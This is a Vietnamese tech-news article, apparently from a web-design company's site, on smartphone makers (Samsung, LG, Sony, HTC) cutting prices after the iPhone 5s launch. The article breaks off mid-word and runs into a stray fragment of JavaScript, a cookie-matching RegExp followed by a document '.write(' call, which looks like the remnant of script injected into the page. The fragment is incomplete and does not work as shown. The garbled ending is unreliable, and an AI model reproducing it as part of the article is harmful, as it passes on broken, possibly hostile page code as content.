Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Chỉ mình iPhone 5s, các hãng smartphone đang âm thầm giảm giá

Chỉ mình iPhone 5s, các hãng smartphone đang âm thầm giảm giá

Giảm giá, giảm giá và giảm giá vẫn là một điệp khúc quen thuộc xuất hiện cùng với những chiếc smartphone cao cấp trong thời điểm hiện tại.

iPhone 5s đang là chiếc smartphone đắt hàng nhất ở thời điểm hiện tại. Và sự xuất hiện của chiếc smartphone cao cấp này đã khiến cho cánh cửa đến với người dùng đang dần hẹp hơn đối với các mẫu smartphone cao cấp còn lại trên thị trường. Có lẽ chính bởi điều này mà hiện nay trên thị các mẫu smartphone cao cấp đang phải âm thầm giảm giá để tránh đi sự cạnh tranh đến từ các đối thủ.

iPhone 5s xuất hiện

Sự xuất hiện của iPhone 5s khiến nhiều smartphone cao cấp điêu đứng

Ngoài những siêu phẩm vừa mới ra mắt như Sony Xperia Z1, LG G2, Samsung Galaxy Note 3 hay iPhone 5s, những model ra mắt trước đó đều đang có xu hướng giảm giá. Dòng sản phẩm Android nằm trong nhóm sản phẩm hạ mạnh nhất, tốc độ ra mắt sản phẩm mới nhanh và số thiết bị trong phân khúc này ngày càng nhiều khiến các hãng cạnh tranh ngày càng quyết liệt.  Trên thị trường chính hãng, Samsung Galaxy S4 là sản phẩm hạ giá mạnh nhất đợt này. Sau khi Note 3 xuất hiện,  Samsung đã điều chỉnh S4 từ 16 triệu xuống còn 14.5 triệu. Ngoài S4 thì hãng Hàn Quốc còn giảm Note 2 xuống còn 12 triệu đồng. Đây là một trong những smartphone có cấu hình khá tốt, việc Note 2 hạ giá đã dọn đường cho sự xuất hiện của Note 3 cuối tháng trước đó.

LG cũng góp mặt trong đợt giảm giá lần này. Chiếc Optimus G Pro từ 14 triệu xuống còn 12.5 triệu, nhường lại mức giá cho LG G2 vừa mới ra mắt. Theo nhiều chủ cửa hàng, LG có thế mạnh ở nhóm giá thấp hơn, sự điều chỉnh giá ở phân khúc cao mang tính chu kỳ cho sản phẩm mới ra. Sau Samsung và LG thì Sony cũng đã giảm nhẹ một số thiết bị, sự có mặt của Z và Z Ultra Xperia Z điều chỉnh chỉ còn 15.5 triệu.

Trong khi đó, mẫu HTC One Mini cũng đã hạ từ 11.6 xuống còn 11.4 triệu đồng. Do cấu hình không thực sự ấn tượng so với những model cùng tầm giá, mức giá giảm của One Mini vẫn chưa đủ để thu hút khách hàng. Không ch (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘